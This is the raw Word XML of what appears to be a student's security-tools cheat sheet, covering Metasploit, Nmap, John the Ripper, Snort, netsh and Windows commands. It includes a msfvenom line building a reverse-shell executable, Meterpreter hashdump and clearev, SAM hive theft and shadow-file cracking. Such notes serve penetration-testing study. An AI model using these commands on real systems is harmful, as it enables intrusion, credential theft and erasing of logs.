      <w:r w:rsidR="000E6152" w:rsidRPr="000E615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Out-File "file.txt" </w:t>
      </w:r>
      <w:r w:rsidR="000E615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display hello, and also save it into a file</w:t>
      </w:r>
      <w:r w:rsidR="00A625A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A625A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FE275B">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findstr hello – find string hello in a file</w:t>
      </w:r>
      <w:r w:rsidR="00FE275B">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findstr /I hello – ignoring case sensitive find the string hello in the file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D00C87" w14:textId="696EB14D" w:rsidR="00065E66" w:rsidRDefault="00065E66" w:rsidP="00065E66">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5E6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-ErrorAction SilentlyContinue</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flag used in script to continue the script even if there is an error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF06EAA" w14:textId="77777777" w:rsidR="00FE275B" w:rsidRPr="00FE275B" w:rsidRDefault="00FE275B" w:rsidP="00FE275B">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F920229" w14:textId="1CBC72D2" w:rsidR="0072035A" w:rsidRDefault="00817295" w:rsidP="009C77E4">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p w14:paraId="14590F47" w14:textId="18C8794F" w:rsidR="003D0B21" w:rsidRPr="000C387E" w:rsidRDefault="003D0B21" w:rsidP="003D0B21">
      <w:pPr>
        <w:jc w:val="center"/>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Msfconsole</w:t>
      </w:r>
      <w:r w:rsidR="00614931">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/Msfvenom</w:t>
      </w:r>
      <w:r w:rsidRPr="00A716BA">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commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CEDA82A" w14:textId="731A1108" w:rsidR="003D0B21" w:rsidRDefault="003D0B21" w:rsidP="00EB2E07">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msf6 – command line of msfconsole</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auxiliary – a piece of code with specific meaning such as connect in anonymous to ftp</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payload – type of communication such as reverse_tcp or bind and more</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encoder – help us to hide the payload for we will not be detected</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post exploitation – we will use that after we got a session, for get more date or improve the session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7090412D" w14:textId="3C83476C" w:rsidR="006E5D31" w:rsidRDefault="00F06909" w:rsidP="006E5D31">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search type:auxiliary – for specific something we want to get and not exploit</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search type:exploit – for scripts for exploits and get a session</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search type:post – for scripts for upgrade sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A62CFF" w14:textId="53A7144F" w:rsidR="00460961" w:rsidRDefault="006E5D31" w:rsidP="00010244">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 8 – use one of the script in the list</w:t>
      </w:r>
      <w:r w:rsidR="004B745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info – will give me info on the option we choose</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options – search which </w:t>
      </w:r>
      <w:r w:rsidR="00D1413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need to enter</w:t>
      </w:r>
      <w:r w:rsidR="00FF3DB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show payloads – show which payload we can choose</w:t>
      </w:r>
      <w:r w:rsidR="00FF3DB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set payload … - choose the payload</w:t>
      </w:r>
      <w:r w:rsidR="0009466A">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set rhost … - define the ip to attack</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run/exploit – run the sript</w:t>
      </w:r>
      <w:r w:rsidR="0081729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run -j – run as job in the background, like when opening a port and waiting for the target to talk to us</w:t>
      </w:r>
      <w:r w:rsidR="0081729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jobs – show all the jobs in the background</w:t>
      </w:r>
      <w:r w:rsidR="003A088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bg/background – save the session in the background so we can do other things as attack other hosts</w:t>
      </w:r>
      <w:r w:rsidR="002010E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A088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open new sessions </w:t>
      </w:r>
      <w:r w:rsidR="002010E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and </w:t>
      </w:r>
      <w:r w:rsidR="003A088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upgrade the current sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD6D5E7" w14:textId="11CAF6EE" w:rsidR="003D3CFF" w:rsidRDefault="00460961" w:rsidP="00D80B1B">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search shell to meterpreter type:post – search for upgrade the session</w:t>
      </w:r>
      <w:r w:rsidR="00E1274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sessions -u 2 – try to upgrade session 2</w:t>
      </w:r>
      <w:r w:rsidR="002D712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search shell_to_meterpreter – it is post exploitation, for upgrade the session</w:t>
      </w:r>
      <w:r w:rsidR="0004290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search suggester – suggest us what to use for upgrade the session</w:t>
      </w:r>
      <w:r w:rsidR="005C2B4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p w14:paraId="1E11E3E6" w14:textId="29BBC62F" w:rsidR="00D80B1B" w:rsidRDefault="00D80B1B" w:rsidP="00D80B1B">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search multi/handler – listener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD19E71" w14:textId="6E1DD5D2" w:rsidR="00A74E5E" w:rsidRDefault="00A74E5E" w:rsidP="00D80B1B">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meterpreter commands:</w:t>
      </w:r>
      <w:r w:rsidR="008154F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getuid – get user id</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getpid – get the current process indentifier</w:t>
      </w:r>
      <w:r w:rsidR="0001024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ps – list of the processes</w:t>
      </w:r>
      <w:r w:rsidR="003B1C0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sysinfo – find data on the system such as hostname</w:t>
      </w:r>
      <w:r w:rsidR="0001024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shell – we can use that to get a shell</w:t>
      </w:r>
      <w:r w:rsidR="002A672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hashdump – hashes of the passwords of the users</w:t>
      </w:r>
      <w:r w:rsidR="005033DB">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migrate -N svchost.exe – migrate to another process by its name to get privileged </w:t>
      </w:r>
      <w:r w:rsidR="0001024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clearev – clear the events log</w:t>
      </w:r>
      <w:r w:rsidR="0001024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execute – execute a command</w:t>
      </w:r>
      <w:r w:rsidR="0001024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reboot – reboot the computer</w:t>
      </w:r>
      <w:r w:rsidR="00AB08CB">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pgrep – search string as grep command</w:t>
      </w:r>
      <w:r w:rsidR="0026564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search -f accounts.txt – find a path to this file (similar to find command in linux)</w:t>
      </w:r>
      <w:r w:rsidR="00AA154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reg save HKLM\sam c:\sam.hiv – save the file sam.hiv on the computer than you can download it from there</w:t>
      </w:r>
      <w:r w:rsidR="00930AF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930AF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download sam.hiv – download this file to our machine</w:t>
      </w:r>
      <w:r w:rsidR="0002682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sudo samdump2 system.hiv sam.hiv -o secret_win – make hashdump from the files system.hiv and sam.hiv we downloaded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5951C3AF" w14:textId="2F969620" w:rsidR="00614931" w:rsidRDefault="006C63AB" w:rsidP="006E5D31">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msfvenom --list payloads | grep meterpreter – give a list of meterpreter payloads </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61493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sudo msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.10.10 lport=7878 -f exe &gt;&gt; file.exe – create payload and name it exe</w:t>
      </w:r>
      <w:r w:rsidR="00CD198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 reverse payload so we need the target to turn this file)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200AFB0E" w14:textId="05F76AAC" w:rsidR="00E34555" w:rsidRDefault="00E34555" w:rsidP="006E5D31">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sudo msfdb init – create postgresql database</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workspace – shows all the workspaces that exist</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workspace -a hello – add new workspace called hello</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workspace default – switch to the default workspace called default</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hosts -c address – the flag -c behave as awk and find the address column</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services -S ‘vsftpd’  - behave as grep and search vsftpd</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F32E7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db_nmap 10.10.10.10 -p 21 -sV – save the results to the DB of </w:t>
      </w:r>
      <w:r w:rsidR="0016510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Metasploit</w:t>
      </w:r>
      <w:r w:rsidR="0016510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db_export /path/file.xml – export the DB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A96E133" w14:textId="3E188790" w:rsidR="00FF42A0" w:rsidRDefault="00FF42A0" w:rsidP="006E5D31">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search auxiliary/admin/smb/ms17_010_command – auxiliary for exploit smb</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225E4C7B" w14:textId="567EA552" w:rsidR="005C2B40" w:rsidRDefault="000D61EA" w:rsidP="006E5D31">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 command “powershell Get-NetFirewallProfile” – when we want to run powershell command, we need first to write powershell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A46724" w14:textId="77777777" w:rsidR="0096541F" w:rsidRDefault="0096541F" w:rsidP="006E5D31">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860BA6B" w14:textId="5A6F6A8A" w:rsidR="005C2B40" w:rsidRPr="000C387E" w:rsidRDefault="005C2B40" w:rsidP="005C2B40">
      <w:pPr>
        <w:jc w:val="center"/>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Firewall</w:t>
      </w:r>
      <w:r w:rsidRPr="00A716BA">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commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63771259" w14:textId="44A2A3F7" w:rsidR="005C2B40" w:rsidRPr="004456B5" w:rsidRDefault="002C1548" w:rsidP="006E5D31">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netsh – network shell</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E706C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004E119A">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etsh advfirewall</w:t>
      </w:r>
      <w:r w:rsidR="00E706C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firewall show rule name=ICMP_allow – shows data on the predefined rule called ICMP_allow</w:t>
      </w:r>
      <w:r w:rsidR="00E706C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netsh advfirewall firewall delete rule name=all – delete all the rules</w:t>
      </w:r>
      <w:r w:rsidR="0096541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netsh advfirewall firewall add rule name = allow_server dir=in action=allow remoteip = 10.10.10.10 – allow incoming traffic from the ip 10.10.10.10</w:t>
      </w:r>
      <w:r w:rsidR="0096541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netsh advfirewall firewall add rule name=accept_443 protocol=TCP dir=out localport=80 action=allow – enable communication outside in port 80 in TCP protocol </w:t>
      </w:r>
      <w:r w:rsidR="00CD32C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netsh advfirewall firewall set rule name=Allow_ICMP dir =in new action=block protocol=ICMPv4 – change exist rule (set command) to block ping</w:t>
      </w:r>
      <w:r w:rsidR="00E706C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p w14:paraId="4B6F8194" w14:textId="77777777" w:rsidR="001A6FC4" w:rsidRDefault="001A6FC4" w:rsidP="00EB2E07">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66C953D" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4" w:rsidP="00EB2E07">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4BE2328" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4" w:rsidP="00EB2E07">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340BFE4" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4" w:rsidP="00EB2E07">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12D627D" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4" w:rsidP="00EB2E07">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A461105" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRPr="00892789" w:rsidRDefault="009C77E4" w:rsidP="00EB2E07">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C7248F1" w14:textId="77777777" w:rsidR="00502E69" w:rsidRPr="00502E69" w:rsidRDefault="00502E69" w:rsidP="00136837">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79DF0B0" w14:textId="2137E2C5" w:rsidR="000C387E" w:rsidRPr="000C387E" w:rsidRDefault="000C387E" w:rsidP="000C387E">
      <w:pPr>
        <w:jc w:val="center"/>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Nmap</w:t>
      </w:r>
      <w:r w:rsidR="00D8498F">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/Masscan</w:t>
      </w:r>
      <w:r w:rsidRPr="00A716BA">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commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0208A4CE" w14:textId="189C453A" w:rsidR="00132564" w:rsidRPr="00132564" w:rsidRDefault="00296C76" w:rsidP="00BF7833">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sudo nmap 10.10.10.10 – scans the default 1000 ports on the ip</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sudo nmap 10.10.10.10 -Pn – does not use ping before scanning the ip, it assumes the destination exist, sometimes there are destinations that block ping, and the default for nmap is that when it does not find the host is active It won’t search for open ports so we want to use -Pn.</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sudo nmap 10.10.10.10 -p- - scans all the ports (</w:t>
      </w:r>
      <w:r w:rsidRPr="00296C7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65,535</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9D0E1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sudo nmap 10.10.10.10 -F – scan the default 100 ports</w:t>
      </w:r>
      <w:r w:rsidR="00C00D1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sudo nmap 10.10.10.10 -sV – scan service versions</w:t>
      </w:r>
      <w:r w:rsidR="0062373E">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sudo nmap 10.10.10.10 -sn – check if the host is up</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296C7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sudo nmap 10.10.10.10</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 3389 – scan only rdp port</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296C7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sudo nmap 10.10.10.10</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 3389,22,53 – scan few ports</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74350B" w:rsidRPr="00296C7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sudo nmap 10.10.10.10</w:t>
      </w:r>
      <w:r w:rsidR="0074350B">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 20 - 100 – scan range of ports</w:t>
      </w:r>
      <w:r w:rsidR="009D0E1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sudo nmap 10.10.10.10/24 – scan all the subnet</w:t>
      </w:r>
      <w:r w:rsidR="0074350B">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8E3BEF" w:rsidRPr="00296C7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sudo nmap 10.10.10.10</w:t>
      </w:r>
      <w:r w:rsidR="008E3BE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 --open – shows in the output only open ports</w:t>
      </w:r>
      <w:r w:rsidR="00BF783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BF7833" w:rsidRPr="00BF783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--script=vulners.nse</w:t>
      </w:r>
      <w:r w:rsidR="00BF783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must to come with -sV for have the versions of the machine it scan, the script check the version of the services of the machine, and check if there is already known vulnerability by checking in the v</w:t>
      </w:r>
      <w:r w:rsidR="00BF7833" w:rsidRPr="00BF783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ulners database</w:t>
      </w:r>
      <w:r w:rsidR="0062373E">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--script</w:t>
      </w:r>
      <w:r w:rsidR="00F806EA">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62373E">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ftp-anon.nse – check if anonymous is user in the target (in ftp)</w:t>
      </w:r>
      <w:r w:rsidR="009E75D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9E75D5" w:rsidRPr="00D8498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--script=ftp-brute.nse</w:t>
      </w:r>
      <w:r w:rsidR="009E75D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try connect to ftp using common and simple credentials</w:t>
      </w:r>
      <w:r w:rsidR="0039333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--script=smb-os-discovery – exploit the smb service to try to get data as hostname, operating system, domain name and more.</w:t>
      </w:r>
      <w:r w:rsidR="0013256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132564" w:rsidRPr="0013256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w:t>
      </w:r>
      <w:r w:rsidR="0013256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132564" w:rsidRPr="0013256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--script=default</w:t>
      </w:r>
      <w:r w:rsidR="0013256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-sC is shorthand of </w:t>
      </w:r>
      <w:r w:rsidR="00132564" w:rsidRPr="0013256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--script=default</w:t>
      </w:r>
      <w:r w:rsidR="0013256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this tell nmap to run a default set of basic scripts of nmap for get info on the target</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB8D174" w14:textId="0E698B10" w:rsidR="003D0295" w:rsidRDefault="003E0EA2" w:rsidP="00132564">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sudo nmap 10.10.10.10 -p 80 -sS -Pn -n –disable-arp-ping –packet-trace -D RND: 5 –</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-sS send syn packet without completing the 3-way handshake</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-n skip the host resolution which make the scanning faster</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3E0EA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–disable-arp-ping</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disable arp ping discovery </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3E0EA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–packet-trace</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shows all the packets sent and receive during the scanning</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3E0EA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 RND:5</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using 5 decoys of ip for harden on the target to scan the real ip scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C2DB64" w14:textId="4B6B9ED3" w:rsidR="00021236" w:rsidRDefault="0062373E" w:rsidP="003E0EA2">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9D0E1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 – udp scan</w:t>
      </w:r>
      <w:r w:rsidR="009D0E1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-T3 – between 0-5 speed of scanning, when 5 you may lose packets and you are not stealth, and T0 is slow and more stealth.</w:t>
      </w:r>
      <w:r w:rsidR="008E373A">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-oG – output greppable</w:t>
      </w:r>
      <w:r w:rsidR="008E373A">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-oN – output normal</w:t>
      </w:r>
      <w:r w:rsidR="008E373A">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-oX – output XML (the only output provide the most info)</w:t>
      </w:r>
      <w:r w:rsidR="008E373A">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8E373A" w:rsidRPr="00296C7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sudo nmap 10.10.10.10</w:t>
      </w:r>
      <w:r w:rsidR="008E373A">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E373A" w:rsidRPr="008E373A">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-sV</w:t>
      </w:r>
      <w:r w:rsidR="008E373A">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10.10.10.10</w:t>
      </w:r>
      <w:r w:rsidR="008E373A" w:rsidRPr="008E373A">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-oG output-file.txt</w:t>
      </w:r>
      <w:r w:rsidR="008E373A">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save in greppable format to text file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E0ACCFB" w14:textId="01C2EE41" w:rsidR="00021236" w:rsidRDefault="006B420E" w:rsidP="008E373A">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 – scan the ports by its order and not random</w:t>
      </w:r>
      <w:r w:rsidR="0036430B">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-O – find os</w:t>
      </w:r>
      <w:r w:rsidR="00407DB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 – specify non standard port</w:t>
      </w:r>
      <w:r w:rsidR="00407DB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-m – for file of</w:t>
      </w:r>
      <w:r w:rsidR="0005505E">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list of</w:t>
      </w:r>
      <w:r w:rsidR="00407DB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ip to attack</w:t>
      </w:r>
      <w:r w:rsidR="00A01C6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-f – specify to stop attack after found right credentials</w:t>
      </w:r>
      <w:r w:rsidR="00A01C6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-t 4 – specify the amount of attacks parallel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099DC988" w14:textId="06D25D07" w:rsidR="00D8498F" w:rsidRPr="00D8498F" w:rsidRDefault="00D8498F" w:rsidP="00D8498F">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498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timeout 30 nmap "$ip" -sV -F | grep open | awk '{for (i=4; i&lt;=NF; i++) printf "%s ", $i; print ""}'</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limit the scan for 30 seconds, show only from column 4 to the last column</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35501F3E" w14:textId="20E73325" w:rsidR="00D8498F" w:rsidRDefault="00D8498F" w:rsidP="00623466">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498F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>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8498F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>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8498F">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>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8498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timeout 30 masscan "$ip" -p U:1-100</w:t>
      </w:r>
      <w:r w:rsidR="00B102B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limit the time of the scan to 30 seconds, and scan all the port between 1-100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA273F5" w14:textId="77777777" w:rsidR="00D8498F" w:rsidRDefault="00D8498F" w:rsidP="008E373A">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29E678E" w14:textId="77777777" w:rsidR="00E204D2" w:rsidRDefault="00E204D2" w:rsidP="008E373A">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1E944FA" w14:textId="7DD1C3D6" w:rsidR="00723AB1" w:rsidRPr="000C387E" w:rsidRDefault="00723AB1" w:rsidP="00723AB1">
      <w:pPr>
        <w:jc w:val="center"/>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Crunch</w:t>
      </w:r>
      <w:r w:rsidRPr="00A716BA">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commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E60F64" w14:textId="725B8A7A" w:rsidR="00723AB1" w:rsidRDefault="00723AB1" w:rsidP="008E373A">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Crunch 4 7 1234hd &gt;&gt; file.txt – minimum 4 chars, maximum 7 chars, the possible chars are 1234hd, save all the options of passwords to file.txt</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 replace small letters</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 replace big letters</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 replace numbers</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 replace symbols</w:t>
      </w:r>
      <w:r w:rsidR="000164C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crunch 7 7 -t lior^^^ &gt;&gt; symbol.txt – the flag -t has to come when using char that replace group of characters as ^, the file will contain lior (constant) word then more 3 symbols.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E52C8E3" w14:textId="77777777" w:rsidR="00EF4C60" w:rsidRDefault="00EF4C60" w:rsidP="00296C76">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E2FB1D9" w14:textId="77777777" w:rsidR="0044046E" w:rsidRDefault="0044046E" w:rsidP="00296C76">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3D9E26A" w14:textId="481114FA" w:rsidR="0044046E" w:rsidRPr="000C387E" w:rsidRDefault="0044046E" w:rsidP="0044046E">
      <w:pPr>
        <w:jc w:val="center"/>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John The Ripper</w:t>
      </w:r>
      <w:r w:rsidRPr="00A716BA">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commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7213275C" w14:textId="22B6156D" w:rsidR="0044046E" w:rsidRDefault="0044046E" w:rsidP="00296C76">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sudo john /etc/shadow – try to crack the /etc/shadow file while using it default list of passwords called password.lst, it will success only if the word very common</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sudo /etc/shadow --wordlist = ./new_list.txt – use the list of passwords to crack the file</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sudo /etc/shadow --wordlist = ./new_list.txt --format  </w:t>
      </w:r>
      <w:r w:rsidR="00FC205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crypt – use the list of passwords to crack the file and use the format we wrote</w:t>
      </w:r>
      <w:r w:rsidR="00FC205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sudo /etc/shadow --format  = crypt --show – it will show the password we already cracked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B283D60" w14:textId="77777777" w:rsidR="009F3651" w:rsidRDefault="00FC205C" w:rsidP="00296C76">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rar2john crackme.rar &gt;&gt; hash.txt – save the hash of the password of the file, the same for files like zip2john, pdf2john, 7z2john, then all left is to crack it with john or other tools.</w:t>
      </w:r>
      <w:r w:rsidR="00AD3C2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bitlocker2john -i locked.vmdk &gt; hash.txt - extract hash of password of memory file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404CD9F9" w14:textId="77777777" w:rsidR="009F3651" w:rsidRDefault="009F3651" w:rsidP="00296C76">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D60E090" w14:textId="77777777" w:rsidR="009F3651" w:rsidRDefault="009F3651" w:rsidP="00296C76">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2CF8B1C" w14:textId="77777777" w:rsidR="009F3651" w:rsidRDefault="009F3651" w:rsidP="00296C76">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C7A026F" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4" w:rsidP="00296C76">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CEABAD1" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4" w:rsidP="00296C76">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865640" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4" w:rsidP="00296C76">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B97D62E" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4" w:rsidP="00296C76">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E1E4EBB" w14:textId="77777777" w:rsidR="009C77E4" w:rsidRDefault="009C77E4" w:rsidP="00296C76">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967F139" w14:textId="77777777" w:rsidR="009F3651" w:rsidRDefault="009F3651" w:rsidP="00296C76">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E5D8433" w14:textId="28DCC5D9" w:rsidR="009F3651" w:rsidRPr="000C387E" w:rsidRDefault="009F3651" w:rsidP="009F3651">
      <w:pPr>
        <w:jc w:val="center"/>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Snort</w:t>
      </w:r>
      <w:r w:rsidRPr="00A716BA">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syntax</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C5645A" w14:textId="5AF120DF" w:rsidR="009F3651" w:rsidRDefault="009F3651" w:rsidP="00296C76">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IDS/IPS snort – it’s a tool for creating rules to pop up an alert when something </w:t>
      </w:r>
      <w:r w:rsidRPr="009F365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exceptional</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happens</w:t>
      </w:r>
      <w:r w:rsidR="00EA275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131B3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 part of cisco, it</w:t>
      </w:r>
      <w:r w:rsidR="00EA275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contains many types of fields as:</w:t>
      </w:r>
      <w:r w:rsidR="00EA275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msg – the message will pop up</w:t>
      </w:r>
      <w:r w:rsidR="00EA275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sid – snort ID, the id of the rule</w:t>
      </w:r>
      <w:r w:rsidR="00EA275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offset – from each byte start to check</w:t>
      </w:r>
      <w:r w:rsidR="00EA275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depth –  how many bytes to investigate</w:t>
      </w:r>
      <w:r w:rsidR="00AA413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content – which string to search</w:t>
      </w:r>
      <w:r w:rsidR="00AA413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rev – which version of the rule (we need to change manually the number when we change the rule so we could track on it)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48AC5523" w14:textId="77777777" w:rsidR="00110024" w:rsidRDefault="00EA275D" w:rsidP="00296C76">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Alert ICMP 10.10.10.10 any -&gt; any any (msg: “ICMP attempt attack”; sid:1000005) – alert us if the ip 10.10.10.10 from any port exist will talk to any ip in every port in icmp message, </w:t>
      </w:r>
      <w:r w:rsidR="0011002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will pop the message “ICMP attempt attack”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6782CE49" w14:textId="3EF7FBB3" w:rsidR="00EF4C60" w:rsidRPr="009C77E4" w:rsidRDefault="00110024" w:rsidP="009C77E4">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Alert TCP 10.10.10.10/24 any -&gt; any any (content:”HTTP”; offset:4; depth:40; msg:”HTTP matched”;) – if there is tcp communication between every ip in10.10.10.10/24 in every port to any ip in any port, it will check between 5-44 bytes and search for HTTP string, if found I will pop the message  “HTTP matched”</w:t>
      </w:r>
      <w:r w:rsidR="009F365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w:t>
      </w:r>
      <w:r w:rsidR="00FC205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p w14:paraId="1BF3FF4F" w14:textId="77777777" w:rsidR="00EF4C60" w:rsidRDefault="00EF4C60" w:rsidP="00EF4C60">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5EA8515" w14:textId="77777777" w:rsidR="00883A17" w:rsidRPr="00294C81" w:rsidRDefault="00883A17" w:rsidP="00883A17">
      <w:pPr>
        <w:jc w:val="center"/>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CMD commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FEA14B4" w14:textId="436F8278" w:rsidR="008C066C" w:rsidRDefault="00480370" w:rsidP="00480370">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Ping 8.8.8.8 – check the connection (may not respond even where there is a connection if the destination block the ICMP protocol)</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ping -a 8.8.8.8 – check the connection and resolve to hostname</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883A1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tasklist – shows processes that running on the machine</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8C066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taskkill /? – shows all the options of taskkill command, like -h in linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BD2D0C" w14:textId="77777777" w:rsidR="00883A17" w:rsidRDefault="00883A17" w:rsidP="00883A17">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cls – clear the cmd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF66F90" w14:textId="0589AED8" w:rsidR="003000B5" w:rsidRDefault="00883A17" w:rsidP="00E42462">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net user – shows a list of users</w:t>
      </w:r>
      <w:r w:rsidR="00C567D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net user administrator – show info the user administrator as local group and last logon and more</w:t>
      </w:r>
      <w:r w:rsidR="00E4246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3000B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net user soc 123 /add – add new user called soc with the password 123</w:t>
      </w:r>
      <w:r w:rsidR="00E4246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E42462" w:rsidRPr="00E4246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net user CyberJunkie /delete</w:t>
      </w:r>
      <w:r w:rsidR="00E4246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delete the user</w:t>
      </w:r>
      <w:r w:rsidR="00425D1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425D14" w:rsidRPr="00425D1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net user </w:t>
      </w:r>
      <w:r w:rsidR="00425D14" w:rsidRPr="00E4246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CyberJunkie </w:t>
      </w:r>
      <w:r w:rsidR="00425D1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1234 -change password of user</w:t>
      </w:r>
      <w:r w:rsidR="007255C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7255CC" w:rsidRPr="007255C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net user </w:t>
      </w:r>
      <w:r w:rsidR="007255CC" w:rsidRPr="00E4246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CyberJunkie </w:t>
      </w:r>
      <w:r w:rsidR="007255CC" w:rsidRPr="007255C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/active:yes</w:t>
      </w:r>
      <w:r w:rsidR="007255C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enable user</w:t>
      </w:r>
      <w:r w:rsidR="007255C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7255CC" w:rsidRPr="007255C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net user </w:t>
      </w:r>
      <w:r w:rsidR="007255CC" w:rsidRPr="00E4246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CyberJunkie </w:t>
      </w:r>
      <w:r w:rsidR="007255CC" w:rsidRPr="007255C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/active:no</w:t>
      </w:r>
      <w:r w:rsidR="007255C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disable user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14186B5D" w14:textId="77777777" w:rsidR="00E96AF9" w:rsidRDefault="00E96AF9" w:rsidP="00EF4C60">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findstr – search for a word like grep</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6AC6B5" w14:textId="77777777" w:rsidR="00E96AF9" w:rsidRDefault="00E96AF9" w:rsidP="00EF4C60">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time – print the current time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCD5EF8" w14:textId="31C19A23" w:rsidR="00E96AF9" w:rsidRDefault="00E96AF9" w:rsidP="00EF4C60">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ipconfig – display network config</w:t>
      </w:r>
      <w:r w:rsidR="00BC0DD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ipcon</w:t>
      </w:r>
      <w:r w:rsidR="00F3563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w:t>
      </w:r>
      <w:r w:rsidR="00BC0DD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ig</w:t>
      </w:r>
      <w:r w:rsidR="00F3563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C0DD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/displaydns – show all the dns resolver cache, all the ip addresses the dns resolved and saved it for better search in the next time</w:t>
      </w:r>
      <w:r w:rsidR="006F50F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ipconfig /release – return you ip address (you will lost connection)</w:t>
      </w:r>
      <w:r w:rsidR="006F50F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6F50F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ipconfig /renew </w:t>
      </w:r>
      <w:r w:rsidR="006D297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6F50F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D297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ask for new ip address</w:t>
      </w:r>
      <w:r w:rsidR="006D297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tracert 8.8.8.8 – show all the path in the way to get to this ip address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CE23C0B" w14:textId="2E2638E1" w:rsidR="003000B5" w:rsidRDefault="00E96AF9" w:rsidP="003000B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cd – show current path, like pwd</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cd .. – go back one directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165B61E0" w14:textId="68592A7D" w:rsidR="003715FF" w:rsidRDefault="00E96AF9" w:rsidP="00EF4C60">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dir – show</w:t>
      </w:r>
      <w:r w:rsidR="003715F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files and directories, like ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA4120C" w14:textId="77777777" w:rsidR="0043317B" w:rsidRDefault="003715FF" w:rsidP="003715FF">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type – enter a file, like cat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EF829B" w14:textId="75AF6B1D" w:rsidR="00804B18" w:rsidRDefault="00804B18" w:rsidP="00804B18">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netstat -ano – known option</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netstat -a – know option</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804B18">
        <w:rPr>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Pr="00804B1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option tells netstat to display all connections and listening ports. It includes both TCP and UDP ports, regardless of their state</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804B18">
        <w:rPr>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04B1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This option instructs netstat to display addresses and port numbers in numerical form </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r w:rsidRPr="00804B1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y default, netstat attempts to determine and display the </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DNS</w:t>
      </w:r>
      <w:r w:rsidRPr="00804B1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name of the remote address</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804B1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804B18">
        <w:rPr>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Pr="00804B1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option adds the Process ID (PID) associated with each connection to the output. This is crucial for identifying which processes on your system are creating which connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C950AD" w14:textId="59672F0E" w:rsidR="00CC4C4B" w:rsidRDefault="00CC4C4B" w:rsidP="00804B18">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tasklist – shows all the tasks/processes and their PID</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taskkill /PID 5072 – stop the process PID 5072</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2601B16A" w14:textId="77777777" w:rsidR="00C4612C" w:rsidRDefault="00FF725F" w:rsidP="00FF725F">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copy /b pic.jpg+sec.zip pic1.jpg – hide the file using ADS</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dir /r – for see files that hidden in ADS</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notepad vac7.jpg:secret.txt – open the text hidden file</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mspaint vac7.jpg:pic.jpg – open the </w:t>
      </w:r>
      <w:r w:rsidR="00A37D8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picture hidden file</w:t>
      </w:r>
      <w:r w:rsidR="00A37D8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firefox.ink F:\ADS\vac7.jpg:bomb.pdf – open the pdf hidden file</w:t>
      </w:r>
      <w:r w:rsidR="008A772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type vac2.jpeg &gt; vac1.jpeg:vac2.jpeg – hide the file vac2.jpeg behind vac1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F849334" w14:textId="77777777" w:rsidR="000E1FB5" w:rsidRDefault="00C4612C" w:rsidP="00FF725F">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mftdump.exe $MFT /o mf.txt – convert the $MFT to text file (need the mftdump.exe file for that) than you can drag the text file to the excel and see the data</w:t>
      </w:r>
    </w:p>
